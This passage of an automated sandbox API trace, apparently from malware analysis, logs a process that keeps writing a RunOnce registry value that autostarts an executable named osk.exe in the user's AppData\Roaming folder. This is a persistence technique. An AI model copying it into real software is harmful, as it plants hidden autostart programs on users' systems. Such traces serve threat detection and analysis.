wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.468] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.468] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.468] KillTimer (hWnd=0x20280, uIDEvent=0x2397) returned 1 [0101.468] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.469] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.469] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.469] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.469] RegCloseKey (hKey=0x280) returned 0x0 [0101.469] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.469] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.469] SetTimer (hWnd=0x20280, nIDEvent=0x2398, uElapse=0xa, lpTimerFunc=0x0) returned 0x2398 [0101.470] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.483] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.484] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.484] KillTimer (hWnd=0x20280, uIDEvent=0x2398) returned 1 [0101.484] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.484] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.484] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.485] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.485] RegCloseKey (hKey=0x280) returned 0x0 [0101.485] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.485] SetTimer (hWnd=0x20280, nIDEvent=0x2399, uElapse=0xa, lpTimerFunc=0x0) returned 0x2399 [0101.485] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.499] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.499] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.499] KillTimer (hWnd=0x20280, uIDEvent=0x2399) returned 1 [0101.499] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.500] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.500] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.500] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.500] RegCloseKey (hKey=0x280) returned 0x0 [0101.500] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.501] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.501] SetTimer (hWnd=0x20280, nIDEvent=0x239a, uElapse=0xa, lpTimerFunc=0x0) returned 0x239a [0101.501] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.515] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.515] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.515] KillTimer (hWnd=0x20280, uIDEvent=0x239a) returned 1 [0101.515] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.516] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.516] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.516] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.516] RegCloseKey (hKey=0x280) returned 0x0 [0101.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.517] SetTimer (hWnd=0x20280, nIDEvent=0x239b, uElapse=0xa, lpTimerFunc=0x0) returned 0x239b [0101.517] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.530] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.530] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.530] KillTimer (hWnd=0x20280, uIDEvent=0x239b) returned 1 [0101.531] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.531] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.531] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.531] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.532] RegCloseKey (hKey=0x280) returned 0x0 [0101.532] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.532] SetTimer (hWnd=0x20280, nIDEvent=0x239c, uElapse=0xa, lpTimerFunc=0x0) returned 0x239c [0101.532] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.546] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.546] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.547] KillTimer (hWnd=0x20280, uIDEvent=0x239c) returned 1 [0101.547] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.547] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.547] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.548] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.548] RegCloseKey (hKey=0x280) returned 0x0 [0101.548] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.548] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.548] SetTimer (hWnd=0x20280, nIDEvent=0x239d, uElapse=0xa, lpTimerFunc=0x0) returned 0x239d [0101.548] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.561] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.561] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.562] KillTimer (hWnd=0x20280, uIDEvent=0x239d) returned 1 [0101.562] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.562] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.562] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.563] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.563] RegCloseKey (hKey=0x280) returned 0x0 [0101.563] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.563] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.563] SetTimer (hWnd=0x20280, nIDEvent=0x239e, uElapse=0xa, lpTimerFunc=0x0) returned 0x239e [0101.563] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.577] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.577] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.577] KillTimer (hWnd=0x20280, uIDEvent=0x239e) returned 1 [0101.578] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.578] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.578] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.578] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.579] RegCloseKey (hKey=0x280) returned 0x0 [0101.579] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.579] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.579] SetTimer (hWnd=0x20280, nIDEvent=0x239f, uElapse=0xa, lpTimerFunc=0x0) returned 0x239f [0101.579] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.593] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.593] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.593] KillTimer (hWnd=0x20280, uIDEvent=0x239f) returned 1 [0101.594] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.594] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.594] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.594] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.594] RegCloseKey (hKey=0x280) returned 0x0 [0101.595] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.595] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.595] SetTimer (hWnd=0x20280, nIDEvent=0x23a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a0 [0101.595] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.608] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.608] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.609] KillTimer (hWnd=0x20280, uIDEvent=0x23a0) returned 1 [0101.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.609] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.609] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.609] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.610] RegCloseKey (hKey=0x280) returned 0x0 [0101.610] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.610] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.610] SetTimer (hWnd=0x20280, nIDEvent=0x23a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a1 [0101.610] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.624] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.624] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.624] KillTimer (hWnd=0x20280, uIDEvent=0x23a1) returned 1 [0101.624] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.625] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.625] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.625] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.625] RegCloseKey (hKey=0x280) returned 0x0 [0101.625] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.626] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.626] SetTimer (hWnd=0x20280, nIDEvent=0x23a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a2 [0101.626] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.640] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.640] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.640] KillTimer (hWnd=0x20280, uIDEvent=0x23a2) returned 1 [0101.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.641] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.641] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.641] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.641] RegCloseKey (hKey=0x280) returned 0x0 [0101.641] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.641] SetTimer (hWnd=0x20280, nIDEvent=0x23a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a3 [0101.642] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.655] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.656] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.656] KillTimer (hWnd=0x20280, uIDEvent=0x23a3) returned 1 [0101.656] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.656] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.656] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.657] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.657] RegCloseKey (hKey=0x280) returned 0x0 [0101.657] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.657] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.657] SetTimer (hWnd=0x20280, nIDEvent=0x23a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a4 [0101.657] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.671] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.671] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.671] KillTimer (hWnd=0x20280, uIDEvent=0x23a4) returned 1 [0101.671] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.671] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.671] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.672] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.672] RegCloseKey (hKey=0x280) returned 0x0 [0101.672] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.672] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.672] SetTimer (hWnd=0x20280, nIDEvent=0x23a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a5 [0101.672] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.688] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.688] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.688] KillTimer (hWnd=0x20280, uIDEvent=0x23a5) returned 1 [0101.688] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.689] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.689] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.689] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.689] RegCloseKey (hKey=0x280) returned 0x0 [0101.689] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.689] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.689] SetTimer (hWnd=0x20280, nIDEvent=0x23a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a6 [0101.689] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.702] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.702] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.702] KillTimer (hWnd=0x20280, uIDEvent=0x23a6) returned 1 [0101.702] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.703] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.703] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.703] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.703] RegCloseKey (hKey=0x280) returned 0x0 [0101.704] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.704] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.704] SetTimer (hWnd=0x20280, nIDEvent=0x23a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a7 [0101.704] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.718] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.718] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.718] KillTimer (hWnd=0x20280, uIDEvent=0x23a7) returned 1 [0101.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.718] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.718] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.719] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.719] RegCloseKey (hKey=0x280) returned 0x0 [0101.719] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.719] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.719] SetTimer (hWnd=0x20280, nIDEvent=0x23a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a8 [0101.719] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.735] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.735] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.735] KillTimer (hWnd=0x20280, uIDEvent=0x23a8) returned 1 [0101.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.736] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.736] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.736] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.737] RegCloseKey (hKey=0x280) returned 0x0 [0101.737] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.737] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.737] SetTimer (hWnd=0x20280, nIDEvent=0x23a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a9 [0101.737] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.780] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.780] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.780] KillTimer (hWnd=0x20280, uIDEvent=0x23a9) returned 1 [0101.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.781] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.781] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) 